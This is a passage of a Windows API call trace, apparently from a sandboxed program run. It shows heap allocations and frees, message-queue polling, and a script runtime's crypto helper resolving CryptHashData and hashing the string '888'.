wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f58 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0223.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.532] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0223.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0223.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0223.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0223.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0223.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0223.533] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f58 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55088, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55068 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.535] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0223.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0223.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.536] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0223.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0223.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0223.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0223.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.537] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.538] CryptHashData (hHash=0xa87390, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0223.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0223.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.538] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0223.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0223.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0223.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0223.539] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0223.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0223.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0223.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0223.539] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0223.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 